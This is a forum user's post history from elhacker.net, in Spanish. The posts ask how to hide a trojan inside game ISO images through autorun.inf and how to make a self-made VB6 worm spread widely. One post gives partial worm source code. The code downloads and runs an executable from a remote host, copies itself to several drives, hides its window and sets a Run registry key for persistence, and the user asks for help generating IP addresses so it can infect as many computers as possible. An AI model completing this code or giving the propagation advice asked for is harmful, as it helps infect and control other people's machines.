elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Guía actualizada para evitar que un ransomware ataque tu empresa


  Mostrar Temas
Páginas: [1]
1  Seguridad Informática / Análisis y Diseño de Malware / Como infectar un ISO hoy en día? es posible?? en: 4 Febrero 2014, 14:04 pm
Hola foreros, bueno estaba renegando con u metodo para infectar un ISO a tra vez del uso de powerISO para poder manipular su contenido pero si junto un troyano con el archivo setup.exe que esta en su interior no se instala el juego (aclaro que lo junto con iexpress), intente jugar un poco con el autorun.inf para decirle que primero ejecute el troyano y despues el setup.exe pero tampoco funciono, me preguntaba si hay algun metodo actual para infectar una ISO o cual es la mejor manera de hacer esto?  Saludos y gracias de antemano!
2  Seguridad Informática / Hacking / Alguien me puede explicar bien esto por favor?? en: 4 Febrero 2014, 11:59 am
Bueno estoy viendo como infectar un autorun, tengo mi powerISO, con esto abro las ISO de lo que quiero y veo su contenido, por lo general siempre hay un autorun.inf

Ahora queria segui este tutorial, y aunque no tengo problemas con el ingles, lo que pasa es que entiendo lo que dice pero no lo comprendo xD Si alguien me puede ayudar con los pasos del autorun se lo agradeceria mucho el tuto que estoy siguiendo es este y estoy trabado en el paso 1!!!

http://webcache.googleusercontent.com/search?q=cache:SRFiJSXxpxIJ:www.hackforums.net/showthread.php?tid%3D302285+&cd=3&hl=es-419&ct=clnk&gl=ar&client=firefox-a

Como es un post de hackforums lo puse desde el cache de google para que no aya problema para nadie....bueno tengo mi carptea en el escritorio con el autorun.inf de la ISO que quiero infectar.....ahora????

Gracias de antemano!y Buenos dias
3  Seguridad Informática / Análisis y Diseño de Malware / metodos de propagacion actuales 2014 (pedido) en: 15 Enero 2014, 21:02 pm
Hola grandes hackers!  Hace algunos meses empeze a estudiar por mi cuenta en mi tiempo libre ( que para bien o para mal ultimamente..es bastante xD ) todo lo que es este mundo de programacion y al poco tiempo me llamo mucho la atencion mas en concreto el mundo del maleware! Y es que me parece de los mas interesante como funcionan los gusanos y troyanos, sobretodo los de esta ultima generacion, y todo empezo sino me equivoco hace unos 25 años con el gusano de Morris, el cual despues de leer y analizar no me parecio tan complejo por eso me anime a seguir investigando pero la verdad los de ultima generacion si que parecen bastante mas complejos.

Bueno hace unos meses entonces empeze a programar aplicaciones sencillas, como un crypter que despues de retocar me quedo funcional y bastante indetectable. Pero ahora entrando al mundo de los gusanos ya se me complico un poco, hace unas cuantas semanas empeze a programar mi primer worm y como ya habia echo el crypter en VB6 bueno decidi probar hacer mi worm con este mismo lenguage.

Hace poco lei en este mismo foro ( lleno de grandes aportes!) la autopsia de un gusano bastante poderoso, entre otros nombres conocido como houdini-worm que parece que esta infectando a lo loco y ser muy complejo, sin embargo aca en menos de 24 horas lo destriparon todo xD  y es aca donde entra mi duda...

Como se llega a ese nivel? Como hacen esas maravillas (aunque un poco destructivas o molestas como este houdini) que son tan capacez, que el creador libera y el software solo se busca la vida y llega tan lejos como para que ahora estemos hablando de el por ejemplo.

Me gustaria saber como incorporar ese tipo de funciones a mi worm basico que solo se copia en algunas carpetas y descarga mi server y poco mas, ya que los tiempos de morris o iloveyou quedaron atras y la propagacion por msn,mail,lan,p2p ya no es efectiva ( lo que me molesta es que esto si ya lo puedo hacer y no me parece tan dificil xD ) Pero ahora estoy en windows 7 y mi worm no puede evolucionar....no les pongo el codigo por que es como dije antes de lo mas basico que hay.

Mi pregunta entonces es : que funciones le puedo agregar a mi worm ( o que deberia leer y estudiar para saber la respuesta) para poder propagarme de forma eficiente, como el houdini por ejemplo ( se que esconde los archivos del usb de manera que windows  no te los muestra y en su lugar genera accesos directos para infectar, bueno esto lo tengo claro y ya lo estoy estudiando a full..) pero bueno necesitaria una manito para avanzar mas rapido, necesito propagarme de forma mas masiva ( no hablo de millones tampoco xD ) pero algo que me de el control de la situacion, que modulos puedo implementar o como hacer....el objetivo principal es estar orgulloso de mi creacion por supuesto! Tambien cuento con Backtrack 5 r 3 que fue como empezo todo esto para mi xD Ya se que Vb6 no es el mejor lenguage pero tambien estoy seguro que igual se pueden hacer cosas muy interesantes con el todavía (por que mucho de lo que veo esta echo con VBS y es muy efectivo!)

Bueno ya escribi mucho xD Cualquier ayuda o debate me ayudaria, si alguien esta como yo y quiere aprender tambien no estaria mal formar un grupo para cubrir mas terreno, las ganas de aprender no me faltan y le dedico mucho tiempo pero eso no va a ser para siempre asi que por eso me urge lo de propagarme xD

Mi principal problema es que soy el unico de mi entorno que se interesa en este tema y no tengo a nadie que me ayude o siquiera que quiera desarrollar nada de nada, entonces todo lo tengo que hacer solo, buscar , ver tutoriales, leer articulos y manuales....

Desde ya gracias y felicidades por los aportes y por hacer de este uno de los foros de malweare mas inrteresantes con los que me tope! De nuevo cualquier ayuda orientacion o consejo va a ser mas que bien recivido! Me disculpo si lastime sus ojos con alguna falta de ortografia, suelo escribir mas en ingles y por eso hace años configure la correccion en ese idioma xD

Sin mas me despido y espero tener algunas respuestas!!!! =D
4  Seguridad Informática / Análisis y Diseño de Malware / Ayuda con proyecto w0rm [VB6]!!!! (incluye modulo de descarga remota ;) ) en: 28 Diciembre 2013, 20:34 pm
Hola foro! primero que nada me gustaria desearles feliz año! Ya empezo el 2014 y me agarro trabajando en un proyecto pero la verdad es que me necesisto unos consejos!  Tengo mi w0rm a la mitad pobresito xD  Bueno les explico el proyecto:

#Nombre: Proyecto W0rm 2013.

#Lenguaje: Visual Basic 6.

#SO: Windows 7 Español-Ingles.

#Funciones:

1-Auto-Copy en todas las unidades disponibles y en algunos de los directorios de windows.

2-Crear llave de Registro para garantizar que se inicie con la PC.

3-Descargar y ejecutar.

4-Propagarce por Usb, Lan y Generar IP.

5-Comprobar estado de w0rm y archivos extra.

#codigo
Código:

Private Sub Form_Load()

On Error Resume Next             'le digo que si hay algun error siga adelante.

URLDownloadToFileA 0, "https://myremotesite.com/Archivo.exe",
"C:\Archivo.exe", 0, 0    'esto es parte del codigo para descargar y ejecutar, le digo de donde conseguir el archivo y donde guardarlo.
 
'#####1-Auto-Copy#####

RutaFinal1 = "C:\testworm.exe" 'le digo donde copiarce
RutaFinal2 = "C:\Windows\testworm.exe"
RutaFinal3 = "D:\testworm.exe"
RutaFinal4 = "F:\testworm.exe"

ArchivoOrigen = App.Path & "\" & App.EXEName & ".exe"  'le digo donde estsa guardado para que pueda copiarce.

FileCopy ArchivoOrigen, RutaFinal1
FileCopy ArchivoOrigen, RutaFinal2
FileCopy ArchivoOrigen, RutaFinal3  'le digo que se copie.
FileCopy ArchivoOrigen, RutaFinal4
FileCopy ArchivoOrigen, RutaFinal5

Me.Visible = False                          'le digo que lo haga oculto

End Sub

' #####2-Crear llave de Registro#####

'en esta parte estoy trabajando ahora.....

Private Sub Resident()

Dim REG As Object
gusano = "C:\Windows\en\testworm.exe"
Set REG = CreateObject("WScript.Shell")
REG.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Test", gusano

'esto no me funciona y llevo un rato probando distintos codigos..pero nada en mi registro......que es lo que esta mal????????


End Sub


'######3-Descargar y ejecutar.######

'segunda parte del codigo de descarga y ejecucion, esta se encarga de ejecutar el Archivo.

Private Sub Timer8_Timer()      'pongo un Timer con intervalo de dos segundos
On Error Resume Next                                  en el form.
If Dir("C:\Archivo.exe") = "" Then
Timer8.Enabled = True
Else
Shell "C:\Archivo.exe", vbNormalFocus
Timer8.Enabled = False                         'Esta parte apaga el timer,para
End If                                                  el Archivo.exe no se siga ejecutando!
 



'#####4-Propagarce por Usb, Lan y Generar iP.#####
    
'trabajando en esto.....

'MadAntrax publico un modulo de clase para esto pero era para Xp....como puedo hacer que funcione en win7? tengo entendido que el modulo asi que el gusano creara IPs para infectar la mayor cantidad de equipos posible!!! Necesito algo asi!

#####5-Comprobar estado######

'trabajando en esto ...

'esto me las puedo arreglar tranquilo despues no me urge xD con unos timers o los comandos minute(now) u hour(now) se que le voy a dar forma...me urgen mas las dos funciones anteriores!


End Sub


Modulo para completar la funcion de Descarga y Ejecucion.
Código:

Declare Sub URLDownloadToFileA Lib "URLMON" (ByVal e As Long, ByVal w As String, ByVal f As String, ByVal g As Long, ByVal n As Long)
Public Declare Function ShellExecute Lib "shell32.dll" Alias "ShellExecuteA" (ByVal hwnd As Long, ByVal lpOperation As String, ByVal lpFile As String, ByVal lpParameters As String, ByVal lpDirectory As String, ByVal nShowCmd As Long) As Long




Bueno la verdad gracias al foro y a mucha busqueda por google,  avanze un poco pero lo que mas necesito ahora seria completar las funciones que tengo incompletas.  MadAntrax posteo un modulo para propagarce por LAN e IP pero era para XP , como puedo hacer esto para win7 ??? a propagarce por IP  me refiero a que cree dinamicamente IPs para infectar la mayor cantidad de equipos posible!

Bueno cualquier ayuda les estare infinitamente agradecido! Desde ya gracias por leer y espero que les sirva el Modulo y el poco codigo que aporto!
Páginas: [1]
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines